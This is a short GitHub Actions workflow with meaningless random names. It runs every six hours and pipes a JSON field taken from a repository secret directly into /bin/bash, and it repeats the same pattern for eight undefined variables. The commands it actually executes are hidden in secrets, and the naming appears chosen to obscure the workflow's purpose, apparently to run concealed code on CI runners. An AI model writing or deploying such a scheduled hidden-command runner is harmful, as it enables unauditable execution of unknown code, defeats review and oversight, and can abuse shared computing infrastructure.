name: lirujing7654
on:
  workflow_dispatch:
  schedule:
    - cron: '1 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lirujing7654
        env:
          qwlz67807: ${{ secrets.qwlz67807 }}
        run: |
          echo $qwlz67807 | jq -r .tdt238 | /bin/bash
          echo $knc6 | jq -r .so0 | /bin/bash
          echo $zn375 | jq -r .m660 | /bin/bash
          echo $rilr73287 | jq -r .rez3 | /bin/bash
          echo $e0312 | jq -r .i249 | /bin/bash
          echo $mbhi54125 | jq -r .ne96760 | /bin/bash
          echo $zt1 | jq -r .afejy25 | /bin/bash
          echo $djuzh669 | jq -r .cm58592 | /bin/bash
          echo $hgju0440 | jq -r .nkns657 | /bin/bash

